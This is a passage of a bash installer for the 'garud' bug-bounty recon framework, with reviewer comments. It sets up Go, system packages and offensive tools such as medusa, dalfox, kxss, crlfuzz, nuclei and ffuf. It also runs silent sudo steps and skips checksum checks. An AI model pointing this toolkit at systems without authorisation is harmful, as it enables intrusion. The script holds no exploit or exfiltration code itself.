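    git clone "$repo" ~/tools/.tmp/"$name" -q
    (cd ~/tools/.tmp/"$name"/"$subdir" 2> /dev/null && go install > /dev/null 2>&1)
    report test -f ~/go/bin/"$name"
}

# fetch_list LABEL URL OUTFILE: download a wordlist into the current directory.
fetch_list(){
    echo -e "\n- Downloading $1 wordlists"
    wget -q "$2" -O "$3"
    report test -s "$3"
}

folders(){
    mkdir -p ~/tools
    mkdir -p ~/tools/.tmp
    mkdir -p ~/.gf
    mkdir -p ~/wordlists
}

# Installs the current Go release under /usr/local/go.
golanguage(){
    local goversion tarball
    # Certificate verification stays on (the listing used curl -k): the answer
    # decides which archive is unpacked into /usr/local as root. Only the first
    # line is the version string.
    goversion=$(curl -s -L 'https://go.dev/VERSION?m=text' | head -n 1)
    if ! [[ "$goversion" =~ ^go[0-9]+(\.[0-9]+)*((rc|beta)[0-9]+)?$ ]]; then
        echo -e "\n${YW}THERE'S A PROBLEM INSTALLING GO, TRY INSTALLING IT MANUALLY${RT}"
        return 1
    fi
    tarball="$goversion.linux-amd64.tar.gz"
    # NOTE(review): the archive is not checked against its published SHA-256.
    # Remove the existing toolchain only after the download succeeded.
    if wget -q "https://go.dev/dl/$tarball"; then
        rm -rf /usr/local/go && tar -C /usr/local -xzf "$tarball"
    fi
    export PATH=$PATH:/usr/local/go/bin
    # Single quotes keep $PATH unexpanded in the file; the listing wrote the
    # installer's current PATH into a .bashrc relative to the working directory.
    echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc
    if command -v go &> /dev/null; then
        echo -e "\n${GR}GO INSTALLED SUCCESSFULLY${RT}"
    else
        echo -e "\n${YW}THERE'S A PROBLEM INSTALLING GO, TRY INSTALLING IT MANUALLY${RT}"
    fi
    rm -f "$tarball"
}

dependencies(){
    mv .github/payloads/patterns/*.json ~/.gf/ 2> /dev/null
    # Continue from the home directory even when no pattern files were moved.
    cd || exit 1
    echo -e "${BK}INSTALLING ALL DEPENDENCIES${RT}"
    sudo apt-get update > /dev/null 2>&1
    sudo apt-get full-upgrade -y > /dev/null 2>&1
    sudo apt-get install apt-transport-https bsdmainutils build-essential snapd cmake curl dnsutils gcc git jq libdata-hexdump-perl libffi-dev libpcap-dev libssl-dev libxml2-dev libxml2-utils libxslt1-dev lynx medusa nmap procps pv python3 python3-dev python3-pip wget zip zlib1g-dev libpcap-dev screen -y > /dev/null 2>&1
    sudo snap install chromium > /dev/null 2>&1
    golanguage
    echo -e "${GR}SUCCESS${RT}\n"
}

githubd(){
    echo -e "${BK}DOWNLOADING AND INSTALLING ALL TOOLS FROM GITHUB${RT}\n"

    echo -e "\n- Installing Sublister"
    git clone https://github.com/aboul3la/Sublist3r.git -q ~/tools/Sublist3r
    cd ~/tools/Sublist3r && sudo pip3 install -r requirements.txt > /dev/null 2>&1
    git clone https://github.com/1ndianl33t/Gf-Patterns -q && mv Gf-Patterns/*.json ~/.gf/ && rm -rf Gf-Patterns/ > /dev/null 2>&1
    # garud runs sublist3r.py; the listing tested for "sublister.py".
    report test -s ~/tools/Sublist3r/sublist3r.py

    echo -e "\n- Installing Bhedak"
    cd && pip3 install bhedak > /dev/null 2>&1
    cd && pip3 install tldextract > /dev/null 2>&1
    # The listing chained `which bhedak &&` in front of this check, so a failed
    # install printed nothing at all.
    report command -v bhedak

    echo -e "\n- Installing Agnee"
    sudo pip3 install git+https://github.com/R0X4R/Search-Engines-Scraper.git > /dev/null 2>&1 && sudo pip3 install agnee > /dev/null 2>&1
    report command -v agnee

    echo -e "\n- Installing uro"
    cd && pip3 install uro > /dev/null 2>&1
    report command -v uro

    go_tool anew github.com/tomnomnom/anew@latest
    go_tool naabu github.com/projectdiscovery/naabu/v2/cmd/naabu@latest
    go_tool gobuster github.com/OJ/gobuster/v3@latest
    # The listing checked ~/go/bin/anew after installing gf.
    go_tool gf github.com/tomnomnom/gf@latest
    go_from_source gospider https://github.com/jaeles-project/gospider

    echo -e "\n- Installing aquatone"
    # Unpack in the scratch directory so the clean-up below cannot touch files
    # of another checkout.
    # NOTE(review): the release archive is installed without a checksum check.
    (
        cd ~/tools/.tmp || exit 1
        wget -q https://github.com/michenriksen/aquatone/releases/download/v1.7.0/aquatone_linux_amd64_1.7.0.zip > /dev/null 2>&1
        unzip -o aquatone_linux_amd64_1.7.0.zip > /dev/null 2>&1
        mv aquatone /usr/bin/ > /dev/null 2>&1
        rm -rf aquatone* LICENSE.txt README.md
    )
    report command -v aquatone

    go_tool assetfinder github.com/tomnomnom/assetfinder@latest
    go_tool crobat github.com/cgboal/sonarsearch/cmd/crobat@latest
    go_tool gau github.com/lc/gau/v2/cmd/gau@latest
    go_tool waybackurls github.com/tomnomnom/waybackurls@latest
    go_tool kxss github.com/Emoe/kxss@latest
    go_tool qsreplace github.com/tomnomnom/qsreplace@latest
    go_from_source ffuf https://github.com/ffuf/ffuf
    go_tool dnsx github.com/projectdiscovery/dnsx/cmd/dnsx@latest
    go_tool notify github.com/projectdiscovery/notify/cmd/notify@latest
    go_tool dalfox github.com/hahwul/dalfox/v2@latest
    go_from_source crlfuzz https://github.com/dwisiswant0/crlfuzz cmd/crlfuzz
    go_tool nuclei github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
    go_tool subfinder github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
    go_from_source httprobe https://github.com/tomnomnom/httprobe.git
    go_tool httpx github.com/projectdiscovery/httpx/cmd/httpx@latest
    go_tool amass 'github.com/OWASP/Amass/v3/...@master'
}

wordlistsd(){
    echo -e "\n${BK}DOWNLOADING ALL THE WORDLISTS${RT}"
    cd ~/wordlists/ || return 1

    fetch_list subdomains https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/deepmagic.com-prefixes-top50000.txt subdomains.txt
    fetch_list resolvers https://raw.githubusercontent.com/janmasarik/resolvers/master/resolvers.txt resolvers.txt
    fetch_list fuzz https://raw.githubusercontent.com/Bo0oM/fuzz.txt/master/fuzz.txt fuzz.txt
}

main(){
    folders
    dependencies
    githubd
    wordlistsd
    echo -e "\n${BK}FINISHING UP THINGS${RT}"
    rm -rf ~/tools/.tmp/ > /dev/null 2>&1
    sudo cp ~/go/bin/* /usr/bin/ > /dev/null 2>&1
    nuclei -update-templates > /dev/null 2>&1
    echo -e "\nPLEASE CONFIGURE NOTIFY API'S IN ${BK} ~/.config/notify/provider-config.yaml ${RT} FILE"
    echo -e "THANKS FOR INSTALLING ${BK}GARUD${RT}. HAPPY HUNTING :)\nPS: If you get any bug using garud, please tweet about it and tag @R0X4R, also support me on ko-fi"
    garud -h 2> /dev/null
}

main
exit
--------------------------------------------------------------------------------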